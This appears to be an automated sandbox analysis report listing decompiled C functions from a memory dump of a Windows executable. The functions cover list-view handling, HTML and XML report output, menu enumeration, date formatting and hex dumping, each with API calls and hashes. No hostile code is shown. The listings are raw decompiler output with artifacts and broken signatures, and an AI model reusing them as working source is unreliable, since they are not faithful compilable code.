                                                                                                                                                      				void* _v72;
                                                                                                                                                      				void _v582;
                                                                                                                                                      				char _v584;
                                                                                                                                                      				struct HWND__* _t52;
                                                                                                                                                      				intOrPtr* _t58;
                                                                                                                                                      				void* _t59;
                                                                                                                                                      				intOrPtr _t63;
                                                                                                                                                      				void* _t71;
                                                                                                                                                      				intOrPtr _t77;
                                                                                                                                                      				void* _t78;
                                                                                                                                                      				intOrPtr _t79;
                                                                                                                                                      				void* _t82;
                                                                                                                                                      				intOrPtr _t87;
                                                                                                                                                      				signed int _t89;
                                                                                                                                                      				short* _t90;
                                                                                                                                                      				void* _t92;
                                                                                                                                                      				void* _t93;
                                                                                                                                                      
                                                                                                                                                      				_t87 = _a4;
                                                                                                                                                      				_t52 = GetDlgItem( *(_t87 + 0x10), 0x3e9);
                                                                                                                                                      				_v8 = _t52;
                                                                                                                                                      				SendMessageW(_t52, 0x1009, 0, 0);
                                                                                                                                                      				SendMessageW(_v8, 0x1036, 0, 0x26);
                                                                                                                                                      				do {
                                                                                                                                                      				} while (SendMessageW(_v8, 0x101c, 0, 0) != 0);
                                                                                                                                                      				_push(0xc8);
                                                                                                                                                      				_push(0);
                                                                                                                                                      				_push(0);
                                                                                                                                                      				_push(_v8);
                                                                                                                                                      				_t78 = 6;
                                                                                                                                                      				E00402842(0x40f454, _t78);
                                                                                                                                                      				_t58 =  *((intOrPtr*)(_t87 + 0x40));
                                                                                                                                                      				_t79 =  *((intOrPtr*)(_t58 + 4));
                                                                                                                                                      				_t77 =  *_t58;
                                                                                                                                                      				_t93 = _t92 + 0x10;
                                                                                                                                                      				_v24 = _t79;
                                                                                                                                                      				_v16 = 0;
                                                                                                                                                      				if(_t79 <= 0) {
                                                                                                                                                      					L10:
                                                                                                                                                      					_t59 = 2;
                                                                                                                                                      					E004027D3(_t59, _v8, 0, _t59);
                                                                                                                                                      					return SetFocus(_v8);
                                                                                                                                                      				} else {
                                                                                                                                                      					goto L3;
                                                                                                                                                      				}
                                                                                                                                                      				do {
                                                                                                                                                      					L3:
                                                                                                                                                      					_v12 = 0;
                                                                                                                                                      					_v20 = 0;
                                                                                                                                                      					do {
                                                                                                                                                      						_t89 = _v12 << 2;
                                                                                                                                                      						if( *((short*)(_t77 + _t89 + 2)) == _v16) {
                                                                                                                                                      							_v584 = 0;
                                                                                                                                                      							memset( &_v582, 0, 0x1fe);
                                                                                                                                                      							_t93 = _t93 + 0xc;
                                                                                                                                                      							_v60 =  &_v584;
                                                                                                                                                      							_v72 = 4;
                                                                                                                                                      							_v56 = 0xff;
                                                                                                                                                      							if(SendMessageW( *( *((intOrPtr*)(_a4 + 0x40)) + 8), 0x105f, _v12,  &_v72) != 0) {
                                                                                                                                                      								_push(0);
                                                                                                                                                      								_push(_v12);
                                                                                                                                                      								_push(0);
                                                                                                                                                      								_push(0);
                                                                                                                                                      								_push(0);
                                                                                                                                                      								_push(_v8);
                                                                                                                                                      								_t82 = 5;
                                                                                                                                                      								_t71 = E004028C5( &_v584, _t82);
                                                                                                                                                      								_t90 = _t89 + _t77;
                                                                                                                                                      								_t83 =  *_t90;
                                                                                                                                                      								_v28 =  *_t90;
                                                                                                                                                      								E00402CD0(_v8, _t71, 0 | _t83 > 0x00000000);
                                                                                                                                                      								_t93 = _t93 + 0x24;
                                                                                                                                                      								if(_v28 == 0) {
                                                                                                                                                      									 *_t90 =  *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x44)) + _v20 + 0xc));
                                                                                                                                                      								}
                                                                                                                                                      							}
                                                                                                                                                      						}
                                                                                                                                                      						_v12 = _v12 + 1;
                                                                                                                                                      						_t63 = _v24;
                                                                                                                                                      						_v20 = _v20 + 0x14;
                                                                                                                                                      					} while (_v12 < _t63);
                                                                                                                                                      					_v16 = _v16 + 1;
                                                                                                                                                      				} while (_v16 < _t63);
                                                                                                                                                      				goto L10;
                                                                                                                                                      			}





























                                                                                                                                                      APIs
                                                                                                                                                      • GetDlgItem.USER32 ref: 004031D5
                                                                                                                                                      • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 004031EE
                                                                                                                                                      • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 004031FB
                                                                                                                                                      • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00403207
                                                                                                                                                      • memset.MSVCRT ref: 0040326B
                                                                                                                                                      • SendMessageW.USER32(?,0000105F,?,?), ref: 004032A0
                                                                                                                                                      • SetFocus.USER32(?), ref: 00403326
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: MessageSend$FocusItemmemset
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 4281309102-0
                                                                                                                                                      • Opcode ID: ab58b64ca0b35e7ad8e6b708a6aaa6c08aba0ce3a91fa458086e11feb534d575
                                                                                                                                                      • Instruction ID: e5884d61c50a84840a295c8cd46100b63ab271327737e15352f16c4cecb35b78
                                                                                                                                                      • Opcode Fuzzy Hash: ab58b64ca0b35e7ad8e6b708a6aaa6c08aba0ce3a91fa458086e11feb534d575
                                                                                                                                                      • Instruction Fuzzy Hash: 46418A35900219BFDB20EF85CD89EAFBF78EF04354F1040AAF908B6291D3719A40DBA4
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 62%
                                                                                                                                                      			E00408AFA(intOrPtr* __ebx, intOrPtr _a4, intOrPtr* _a8) {
                                                                                                                                                      				signed int _v8;
                                                                                                                                                      				intOrPtr _v12;
                                                                                                                                                      				signed int _v16;
                                                                                                                                                      				signed int _v20;
                                                                                                                                                      				signed int _v24;
                                                                                                                                                      				signed int _v28;
                                                                                                                                                      				void _v68;
                                                                                                                                                      				char _v108;
                                                                                                                                                      				void _v160;
                                                                                                                                                      				void* __esi;
                                                                                                                                                      				signed int _t55;
                                                                                                                                                      				void* _t57;
                                                                                                                                                      				wchar_t* _t67;
                                                                                                                                                      				intOrPtr* _t73;
                                                                                                                                                      				signed int _t74;
                                                                                                                                                      				signed int _t86;
                                                                                                                                                      				signed int _t94;
                                                                                                                                                      				intOrPtr* _t97;
                                                                                                                                                      				void* _t99;
                                                                                                                                                      				void* _t101;
                                                                                                                                                      
                                                                                                                                                      				_t73 = __ebx;
                                                                                                                                                      				_t74 = 0xd;
                                                                                                                                                      				_push(9);
                                                                                                                                                      				memcpy( &_v160, L"<td bgcolor=#%s nowrap>%s", _t74 << 2);
                                                                                                                                                      				memcpy( &_v68, L"<td bgcolor=#%s>%s", 0 << 2);
                                                                                                                                                      				_t101 = _t99 + 0x18;
                                                                                                                                                      				asm("movsw");
                                                                                                                                                      				E00408857(__ebx, 0, _a4, L"<tr>");
                                                                                                                                                      				_t94 = 0;
                                                                                                                                                      				if( *((intOrPtr*)(__ebx + 0x34)) > 0) {
                                                                                                                                                      					do {
                                                                                                                                                      						_t55 =  *( *((intOrPtr*)(_t73 + 0x38)) + _t94 * 4);
                                                                                                                                                      						_v8 = _t55;
                                                                                                                                                      						_t57 =  &_v160;
                                                                                                                                                      						if( *((intOrPtr*)(_t55 * 0x14 +  *((intOrPtr*)(_t73 + 0x48)) + 8)) == 0) {
                                                                                                                                                      							_t57 =  &_v68;
                                                                                                                                                      						}
                                                                                                                                                      						_t97 = _a8;
                                                                                                                                                      						_v28 = _v28 | 0xffffffff;
                                                                                                                                                      						_v24 = _v24 | 0xffffffff;
                                                                                                                                                      						_v20 = _v20 | 0xffffffff;
                                                                                                                                                      						_v16 = _v16 & 0x00000000;
                                                                                                                                                      						_v12 = _t57;
                                                                                                                                                      						 *((intOrPtr*)( *_t73 + 0x34))(5, _t94, _t97,  &_v28);
                                                                                                                                                      						E0040DBA9(_v28,  &_v108);
                                                                                                                                                      						E0040DBDA( *((intOrPtr*)( *_t97))(_v8,  *((intOrPtr*)(_t73 + 0x68))),  *(_t73 + 0x6c));
                                                                                                                                                      						 *((intOrPtr*)( *_t73 + 0x54))( *(_t73 + 0x6c), _t97, _v8);
                                                                                                                                                      						_t67 =  *(_t73 + 0x6c);
                                                                                                                                                      						_t86 =  *_t67 & 0x0000ffff;
                                                                                                                                                      						if(_t86 == 0 || _t86 == 0x20) {
                                                                                                                                                      							wcscat(_t67, L"&nbsp;");
                                                                                                                                                      							_pop(0);
                                                                                                                                                      						}
                                                                                                                                                      						E0040DC79( &_v28,  *((intOrPtr*)(_t73 + 0x70)),  *(_t73 + 0x6c));
                                                                                                                                                      						_push( *((intOrPtr*)(_t73 + 0x70)));
                                                                                                                                                      						_push( &_v108);
                                                                                                                                                      						_push(_v12);
                                                                                                                                                      						_push(0x2000);
                                                                                                                                                      						_push( *((intOrPtr*)(_t73 + 0x68)));
                                                                                                                                                      						L0040DFD6();
                                                                                                                                                      						_t101 = _t101 + 0x1c;
                                                                                                                                                      						E00408857(_t73, 0, _a4,  *((intOrPtr*)(_t73 + 0x68)));
                                                                                                                                                      						_t94 = _t94 + 1;
                                                                                                                                                      					} while (_t94 <  *((intOrPtr*)(_t73 + 0x34)));
                                                                                                                                                      				}
                                                                                                                                                      				return E00408857(_t73, 0, _a4, L"\r\n");
                                                                                                                                                      			}
























APIs
Strings
Memory Dump Source
• Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp
• Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp
• Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp
• Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp
Similarity
• API ID: _snwprintfwcscat
• String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
• API String ID: 384018552-4153097237
• Opcode ID: aacd1c3f04bbbde4388d7715a2edef3f998899fbad5d42021ae6a7ad680bf7af
• Instruction ID: 96aa4744b540e0de5a537674df1821739e57c2366694ca0e95279aca4d83ea93
• Opcode Fuzzy Hash: aacd1c3f04bbbde4388d7715a2edef3f998899fbad5d42021ae6a7ad680bf7af
• Instruction Fuzzy Hash: 10318D31900208AFDF10AF55CC85E9A7B75FF04320F1040BAF855AB2E2DB35A945DB94
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 42%
                                                                                                                                                      			E00406E97(void* __ecx, void* __eflags, intOrPtr _a4, struct HMENU__* _a8, intOrPtr _a12, int _a16, intOrPtr _a20, wchar_t* _a36, intOrPtr _a40, long _a48, void _a50) {
                                                                                                                                                      				struct tagMENUITEMINFOW _v0;
                                                                                                                                                      				int _t24;
                                                                                                                                                      				wchar_t* _t30;
                                                                                                                                                      				intOrPtr _t32;
                                                                                                                                                      				int _t34;
                                                                                                                                                      				int _t42;
                                                                                                                                                      				signed int _t47;
                                                                                                                                                      				signed int _t48;
                                                                                                                                                      
                                                                                                                                                      				_t36 = __ecx;
                                                                                                                                                      				_t48 = _t47 & 0xfffffff8;
                                                                                                                                                      				E0040E340(0x203c, __ecx);
                                                                                                                                                      				_t24 = GetMenuItemCount(_a8);
                                                                                                                                                      				_t34 = _t24;
                                                                                                                                                      				_t42 = 0;
                                                                                                                                                      				if(_t34 <= 0) {
                                                                                                                                                      					L13:
                                                                                                                                                      					return _t24;
                                                                                                                                                      				} else {
                                                                                                                                                      					goto L1;
                                                                                                                                                      				}
                                                                                                                                                      				do {
                                                                                                                                                      					L1:
                                                                                                                                                      					memset( &_a50, 0, 0x2000);
                                                                                                                                                      					_t48 = _t48 + 0xc;
                                                                                                                                                      					_a36 =  &_a48;
                                                                                                                                                      					_v0.cbSize = 0x30;
                                                                                                                                                      					_a4 = 0x36;
                                                                                                                                                      					_a40 = 0x1000;
                                                                                                                                                      					_a16 = 0;
                                                                                                                                                      					_a48 = 0;
                                                                                                                                                      					_t24 = GetMenuItemInfoW(_a8, _t42, 1,  &_v0);
                                                                                                                                                      					if(_t24 == 0) {
                                                                                                                                                      						goto L12;
                                                                                                                                                      					}
                                                                                                                                                      					if(_a48 == 0) {
                                                                                                                                                      						L10:
                                                                                                                                                      						_t56 = _a20;
                                                                                                                                                      						if(_a20 != 0) {
                                                                                                                                                      							_push(0);
                                                                                                                                                      							_push(_a20);
                                                                                                                                                      							_push(_a4);
                                                                                                                                                      							_t24 = E00406E97(_t36, _t56);
                                                                                                                                                      							_t48 = _t48 + 0xc;
                                                                                                                                                      						}
                                                                                                                                                      						goto L12;
                                                                                                                                                      					}
                                                                                                                                                      					_t30 = wcschr( &_a48, 9);
                                                                                                                                                      					if(_t30 != 0) {
                                                                                                                                                      						 *_t30 = 0;
                                                                                                                                                      					}
                                                                                                                                                      					_t31 = _a16;
                                                                                                                                                      					if(_a20 != 0) {
                                                                                                                                                      						if(_a12 == 0) {
                                                                                                                                                      							 *0x412c34 =  *0x412c34 + 1;
                                                                                                                                                      							_t32 =  *0x412c34; // 0x0
                                                                                                                                                      							_t31 = _t32 + 0x11558;
                                                                                                                                                      							__eflags = _t32 + 0x11558;
                                                                                                                                                      						} else {
                                                                                                                                                      							_t17 = _t42 + 0x11171; // 0x11171
                                                                                                                                                      							_t31 = _t17;
                                                                                                                                                      						}
                                                                                                                                                      					}
                                                                                                                                                      					_t24 = E00406E5E(_t31,  &_a48);
                                                                                                                                                      					_pop(_t36);
                                                                                                                                                      					goto L10;
                                                                                                                                                      					L12:
                                                                                                                                                      					_t42 = _t42 + 1;
                                                                                                                                                      				} while (_t42 < _t34);
                                                                                                                                                      				goto L13;
                                                                                                                                                      			}


                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ItemMenu$CountInfomemsetwcschr
                                                                                                                                                      • String ID: 0$6
                                                                                                                                                      • API String ID: 2029023288-3849865405
                                                                                                                                                      • Opcode ID: a0b7b54f04bcc436da1d99830b0d0b16883f872afdca66473e688fd6b38d6a97
                                                                                                                                                      • Instruction ID: 1dbbb6522b92818e37563bbb7cb847876382a1d5db42aae0addc6953e8b82e52
                                                                                                                                                      • Opcode Fuzzy Hash: a0b7b54f04bcc436da1d99830b0d0b16883f872afdca66473e688fd6b38d6a97
                                                                                                                                                      • Instruction Fuzzy Hash: 9021BF31105345ABC7209F61E84599FB7B8FB84754F000A3FF645A2280E7769A24CB9A
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 82%
                                                                                                                                                      			E004019D2(void* __ebx) {
                                                                                                                                                      				int _v8;
                                                                                                                                                      				int _v12;
                                                                                                                                                      				intOrPtr _v16;
                                                                                                                                                      				intOrPtr _v20;
                                                                                                                                                      				int _v24;
                                                                                                                                                      				int _v28;
                                                                                                                                                      				void* _t26;
                                                                                                                                                      				int _t30;
                                                                                                                                                      				void* _t33;
                                                                                                                                                      				int _t36;
                                                                                                                                                      				int _t37;
                                                                                                                                                      				int _t40;
                                                                                                                                                      				int _t49;
                                                                                                                                                      
                                                                                                                                                      				_t33 = __ebx;
                                                                                                                                                      				if( *((intOrPtr*)(__ebx + 0x208)) == 0) {
                                                                                                                                                      					return _t26;
                                                                                                                                                      				} else {
                                                                                                                                                      					asm("movsd");
                                                                                                                                                      					asm("movsd");
                                                                                                                                                      					asm("movsd");
                                                                                                                                                      					asm("movsd");
                                                                                                                                                      					_v8 = GetSystemMetrics(0x4e);
                                                                                                                                                      					_v12 = GetSystemMetrics(0x4f);
                                                                                                                                                      					_t40 = GetSystemMetrics(0x4c);
                                                                                                                                                      					_t30 = GetSystemMetrics(0x4d);
                                                                                                                                                      					if(_v8 == 0 || _v12 == 0) {
                                                                                                                                                      						_v8 = GetSystemMetrics(0);
                                                                                                                                                      						_v12 = GetSystemMetrics(1);
                                                                                                                                                      						_t40 = 0;
                                                                                                                                                      						_t30 = 0;
                                                                                                                                                      					} else {
                                                                                                                                                      						_v8 = _v8 + _t40;
                                                                                                                                                      						_v12 = _v12 + _t30;
                                                                                                                                                      					}
                                                                                                                                                      					_t49 = _v20 - _v28;
                                                                                                                                                      					if(_t49 > 0x14) {
                                                                                                                                                      						_t37 = _v24;
                                                                                                                                                      						_t36 = _v16 - _t37;
                                                                                                                                                      						if(_t36 > 0x14 && _v20 > _t40 + 5) {
                                                                                                                                                      							_t30 = _t30 + 0xfffffff6;
                                                                                                                                                      							if(_t37 >= _t30) {
                                                                                                                                                      								_t30 = _v28;
                                                                                                                                                      								if(_t30 + 0x14 < _v8 && _t37 + 0x14 < _v12 &&  *((intOrPtr*)(_t33 + 0x250)) != 0) {
                                                                                                                                                      									_t30 = SetWindowPos( *(_t33 + 0x208), 0, _t30, _t37, _t49, _t36, 0x204);
                                                                                                                                                      								}
                                                                                                                                                      							}
                                                                                                                                                      						}
                                                                                                                                                      					}
                                                                                                                                                      					return _t30;
                                                                                                                                                      				}
                                                                                                                                                      			}

















                                                                                                                                                      APIs
                                                                                                                                                      • GetSystemMetrics.USER32 ref: 004019FC
                                                                                                                                                      • GetSystemMetrics.USER32 ref: 00401A03
                                                                                                                                                      • GetSystemMetrics.USER32 ref: 00401A0A
                                                                                                                                                      • GetSystemMetrics.USER32 ref: 00401A10
                                                                                                                                                      • GetSystemMetrics.USER32 ref: 00401A27
                                                                                                                                                      • GetSystemMetrics.USER32 ref: 00401A2E
                                                                                                                                                      • SetWindowPos.USER32(00000000,00000000,?,?,?,?,00000204,?,?,?,?,?,004019CF), ref: 00401A8B
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: MetricsSystem$Window
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1155976603-0
                                                                                                                                                      • Opcode ID: 17a53185f7517543453a4be3c81a3bbd36f75940ad8d5731b7ecdc36ba319df0
                                                                                                                                                      • Instruction ID: e852b1759cb622fbc777dcf2117f8c3e284781620e86bac7d74114db1399c759
                                                                                                                                                      • Opcode Fuzzy Hash: 17a53185f7517543453a4be3c81a3bbd36f75940ad8d5731b7ecdc36ba319df0
                                                                                                                                                      • Instruction Fuzzy Hash: 27215C72E4221AEBDF10DFA88D496AF7B71EF40320F1141BAD904BB2D1D674A981CE94
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E00405C17(FILETIME* __eax, wchar_t* _a4) {
                                                                                                                                                      				struct _SYSTEMTIME _v24;
                                                                                                                                                      				long _v280;
                                                                                                                                                      				long _v536;
                                                                                                                                                      				FILETIME* _t15;
                                                                                                                                                      
                                                                                                                                                      				_t15 = __eax;
                                                                                                                                                      				if(__eax->dwHighDateTime != 0 ||  *__eax != 0) {
                                                                                                                                                      					if(FileTimeToSystemTime(_t15,  &_v24) == 0 || _v24 <= 0x3e8) {
                                                                                                                                                      						goto L5;
                                                                                                                                                      					} else {
                                                                                                                                                      						GetDateFormatW(0x400, 1,  &_v24, 0,  &_v280, 0x80);
                                                                                                                                                      						GetTimeFormatW(0x400, 0,  &_v24, 0,  &_v536, 0x80);
                                                                                                                                                      						wcscpy(_a4,  &_v280);
                                                                                                                                                      						wcscat(_a4, " ");
                                                                                                                                                      						wcscat(_a4,  &_v536);
                                                                                                                                                      					}
                                                                                                                                                      				} else {
                                                                                                                                                      					L5:
                                                                                                                                                      					wcscpy(_a4, 0x40f454);
                                                                                                                                                      				}
                                                                                                                                                      				return _a4;
                                                                                                                                                      			}








                                                                                                                                                      APIs
                                                                                                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00405C33
                                                                                                                                                      • GetDateFormatW.KERNEL32(00000400,00000001,000003E8,00000000,?,00000080), ref: 00405C5F
                                                                                                                                                      • GetTimeFormatW.KERNEL32(00000400,00000000,000003E8,00000000,?,00000080), ref: 00405C74
                                                                                                                                                      • wcscpy.MSVCRT ref: 00405C84
                                                                                                                                                      • wcscat.MSVCRT ref: 00405C91
                                                                                                                                                      • wcscat.MSVCRT ref: 00405CA0
                                                                                                                                                      • wcscpy.MSVCRT ref: 00405CB2
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1331804452-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 71%
                                                                                                                                                      			E00405D33(wchar_t* __edi, intOrPtr _a4, signed int _a8) {
                                                                                                                                                      				void _v514;
                                                                                                                                                      				long _v516;
                                                                                                                                                      				wchar_t* _t34;
                                                                                                                                                      				signed int _t35;
                                                                                                                                                      				void* _t36;
                                                                                                                                                      				void* _t37;
                                                                                                                                                      
                                                                                                                                                      				_t34 = __edi;
                                                                                                                                                      				_v516 = _v516 & 0x00000000;
                                                                                                                                                      				memset( &_v514, 0, 0x1fc);
                                                                                                                                                      				 *__edi =  *__edi & 0x00000000;
                                                                                                                                                      				_t37 = _t36 + 0xc;
                                                                                                                                                      				_t35 = 0;
                                                                                                                                                      				do {
                                                                                                                                                      					_push( *(_t35 + _a4) & 0x000000ff);
                                                                                                                                                      					_push(L"%2.2X");
                                                                                                                                                      					_push(0xff);
                                                                                                                                                      					_push( &_v516);
                                                                                                                                                      					L0040DFD6();
                                                                                                                                                      					_t37 = _t37 + 0x10;
                                                                                                                                                      					if(_t35 > 0) {
                                                                                                                                                      						wcscat(_t34, " ");
                                                                                                                                                      					}
                                                                                                                                                      					if(_a8 > 0) {
                                                                                                                                                      						asm("cdq");
                                                                                                                                                      						if(_t35 % _a8 == 0) {
                                                                                                                                                      							wcscat(_t34, L"  ");
                                                                                                                                                      						}
                                                                                                                                                      					}
                                                                                                                                                      					wcscat(_t34,  &_v516);
                                                                                                                                                      					_t35 = _t35 + 1;
                                                                                                                                                      				} while (_t35 < 0x80);
                                                                                                                                                      				return _t34;
                                                                                                                                                      			}










                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: wcscat$_snwprintfmemset
                                                                                                                                                      • String ID: %2.2X
                                                                                                                                                      • API String ID: 2521778956-791839006
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 46%
                                                                                                                                                      			E004093B3(intOrPtr* __ecx, intOrPtr _a4) {
                                                                                                                                                      				void _v514;
                                                                                                                                                      				char _v516;
                                                                                                                                                      				void _v1026;
                                                                                                                                                      				char _v1028;
                                                                                                                                                      				void* __esi;
                                                                                                                                                      				intOrPtr* _t16;
                                                                                                                                                      				void* _t19;
                                                                                                                                                      				intOrPtr* _t29;
                                                                                                                                                      				char* _t31;
                                                                                                                                                      
                                                                                                                                                      				_t27 = __ecx;
                                                                                                                                                      				_t29 = __ecx;
                                                                                                                                                      				_v516 = 0;
                                                                                                                                                      				memset( &_v514, 0, 0x1fc);
                                                                                                                                                      				_v1028 = 0;
                                                                                                                                                      				memset( &_v1026, 0, 0x1fc);
                                                                                                                                                      				_t16 = _t29;
                                                                                                                                                      				if( *((intOrPtr*)(_t29 + 0x24)) == 0) {
                                                                                                                                                      					_push(L"<?xml version=\"1.0\" encoding=\"ISO-8859-1\" ?>\r\n");
                                                                                                                                                      				} else {
                                                                                                                                                      					_push(L"<?xml version=\"1.0\" ?>\r\n");
                                                                                                                                                      				}
                                                                                                                                                      				E00408857(_t16, _t27);
                                                                                                                                                      				_t19 =  *((intOrPtr*)( *_t29 + 0x24))(_a4);
                                                                                                                                                      				_t31 =  &_v516;
                                                                                                                                                      				E004086F5(_t31, _t19);
                                                                                                                                                      				_push(_t31);
                                                                                                                                                      				_push(L"<%s>\r\n");
                                                                                                                                                      				_push(0xff);
                                                                                                                                                      				_push( &_v1028);
                                                                                                                                                      				L0040DFD6();
                                                                                                                                                      				return E00408857(_t29, _t29, _a4,  &_v1028);
                                                                                                                                                      			}













                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00409403
                                                                                                                                                      • <%s>, xrefs: 00409426
                                                                                                                                                      • <?xml version="1.0" ?>, xrefs: 004093FC
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memset$_snwprintf
                                                                                                                                                      • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                                                                      • API String ID: 3473751417-2880344631
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E0040DDA7(void* __esi, void* _a4, wchar_t* _a8, wchar_t* _a12) {
                                                                                                                                                      				void* _v8;
                                                                                                                                                      				int _v12;
                                                                                                                                                      				short _v524;
                                                                                                                                                      				char _v1036;
                                                                                                                                                      				void* __edi;
                                                                                                                                                      
                                                                                                                                                      				wcscpy( &_v524, L"\\StringFileInfo\\");
                                                                                                                                                      				wcscat( &_v524, _a8);
                                                                                                                                                      				wcscat( &_v524, "\\");
                                                                                                                                                      				wcscat( &_v524, _a12);
                                                                                                                                                      				if(VerQueryValueW(_a4,  &_v524,  &_v8,  &_v12) == 0) {
                                                                                                                                                      					return 0;
                                                                                                                                                      				}
                                                                                                                                                      				_t34 =  &_v1036;
                                                                                                                                                      				E004055FF(0xff,  &_v1036, _v8);
                                                                                                                                                      				E004056C9(_t34, __esi);
                                                                                                                                                      				return 1;
                                                                                                                                                      			}









                                                                                                                                                      APIs
                                                                                                                                                      • wcscpy.MSVCRT ref: 0040DDBC
                                                                                                                                                      • wcscat.MSVCRT ref: 0040DDCB
                                                                                                                                                      • wcscat.MSVCRT ref: 0040DDDC
                                                                                                                                                      • wcscat.MSVCRT ref: 0040DDEB
                                                                                                                                                      • VerQueryValueW.VERSION(?,?,00000000,?), ref: 0040DE05
                                                                                                                                                        • Part of subcall function 004055FF: wcslen.MSVCRT ref: 00405606
                                                                                                                                                        • Part of subcall function 004055FF: memcpy.MSVCRT ref: 0040561C
                                                                                                                                                        • Part of subcall function 004056C9: lstrcpyW.KERNEL32 ref: 004056DE
                                                                                                                                                        • Part of subcall function 004056C9: lstrlenW.KERNEL32(?), ref: 004056E5
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp
